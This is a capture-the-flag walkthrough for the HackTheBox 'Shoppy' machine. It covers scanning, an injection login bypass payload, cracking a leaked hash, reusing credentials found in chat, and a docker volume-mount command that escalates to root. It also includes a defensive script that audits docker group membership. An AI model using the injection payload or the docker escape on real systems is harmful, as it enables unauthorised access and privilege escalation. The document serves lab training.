
Shoppy | HackTheBox | Easy


# Shoppy Walkthrough

## Reconnaissance

```sh
nmap -sV -sC <target-ip>
```

Results

```
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 21:13 EST
Nmap scan report for 10.10.11.180
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds
```

Looks like there's nothing much useful!

## Directory bruteforcing

```sh
gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
```

Results:

```
┌──(root㉿kali/machines/shoppy-HTB)
[
└─# gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb
[+] Method:                  GET
[+] Threads:                 500
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,301
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/16 00:46:53 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 28] [--> /login]
/login                (Status: 200) [Size: 1074]
/Login                (Status: 200) [Size: 1074]
Progress: 3984 / 220561 (1.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/16 00:46:58 Finished
===============================================================
```

We found the login and admin pages on shoppy.htb.

Let's try SQLi here!

username: `admin'||'1==1`, password: `random`

Boom! We are logged in.

Try the same SQLi again here!


<img width="520" alt="sqli-after-admin" src="https://user-images.githubusercontent.com/95465072/208038413-8b3e3f82-e8f5-4f4f-b8d5-9a3264871104.png">


Download the transcript!

Great! We got the **josh** user's password hash.

<img width="461" alt="pass-user-afteradmin-download" src="https://user-images.githubusercontent.com/95465072/208038531-1e1741e0-9ce4-438d-9de1-db802d67c5e6.png">

[Crack this hash here](https://crackstation.net/)

<img width="786" alt="hash-for-josh" src="https://user-images.githubusercontent.com/95465072/208038459-27930a24-ad73-43b6-ae02-44f679fefe1e.png">


|hash|password  |
|--|--|
|  6ebcea65320589ca4f2f1ce039975995| remembermethisway |

## Subdomain Enumeration
```sh
gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
```

Results:

```
┌──(root㉿kali)-[/usr/share/wordlists/SecLists]
└─# gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://shoppy.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   false
===============================================================
2022/12/16 01:08:10 Starting gobuster in VHOST enumeration mode
===============================================================
mattermost                (Status: 200) [Size: 1074]
```

We got the subdomain http://mattermost.shoppy.htb; add it to /etc/hosts.

Log in as josh:

username: `josh`, password: `remembermethisway`

Boom! In the comments section we got:

```
jaeger
4:22 AM

Hey @josh,
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.
```

Based on this comment, we can try SSH:

```sh
ssh jaeger@shoppy.htb
```

password: `Sh0ppyBest@pp!`

Got the user flag!

```
jaeger@shoppy:~$ ls
Desktop  Music  ShoppyApp  user.txt
Documents  Pictures  shoppy_start.sh  Videos
Downloads  Public  Templates
jaeger@shoppy:~$ cat user.txt
3056a9074c4c2bd189e9************
jaeger@shoppy:~$
```

## Privilege Escalation

```sh
sudo -l
```

From this we can see that we can execute password-manager as the root user!

```sh
cat /home/deploy/password-manager

sudo -u deploy /home/deploy/password-manager
```

Try this with SSH again:

```sh
ssh deploy@shoppy.htb
```

password: `Deploying@pp!`

It looks like we are in the docker container! Let's try the GTFOBins payload for sudo:

GTFOBins -> docker -> sudo

```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
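The `docker run -v /:/mnt` command above mounts the host's root filesystem into a container, so any account that can reach the Docker daemon is effectively root on the host. The audit below is an added example, not part of the original walkthrough; it assumes access is granted through the `docker` group (the page does not show how `deploy` got it), and the sample files, GIDs and the `builder` account are constructed.

```sh
#!/bin/sh
# Added example: audit which accounts reach the Docker daemon via group membership.

# Constructed sample files (GIDs and the "builder" account are made up).
make_sample() {
    cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:jaeger
docker:x:998:deploy
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
jaeger:x:1000:1000::/home/jaeger:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/sh
builder:x:1002:998::/home/builder:/bin/sh
EOF
}

# docker_group_users GROUP_FILE PASSWD_FILE [GROUP_NAME]
# Prints one user per line: supplementary members listed in the group file plus
# accounts whose primary GID is the group's GID (the member list omits those).
docker_group_users() {
    group_file=${1:-/etc/group}
    passwd_file=${2:-/etc/passwd}
    group_name=${3:-docker}
    gid=$(awk -F: -v g="$group_name" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0    # group absent: nothing to report
    {
        awk -F: -v g="$group_name" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
}

# audit_docker_group GROUP_FILE PASSWD_FILE
# Returns 1 and names the accounts if anyone other than root is in the group.
audit_docker_group() {
    users=$(docker_group_users "$1" "$2" | grep -vx root || true)
    [ -n "$users" ] || return 0
    printf 'root-equivalent via docker group: %s\n' $users
    return 1
}
```

Any sudo rule that lets another user run commands as a listed account inherits the same access, as with `jaeger` and `deploy` in this walkthrough.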

Congratulations! Got the root flag!

Root.txt

d9dd59daa7341501bb93c****************

This post is licensed under CC BY 4.0 by the author.
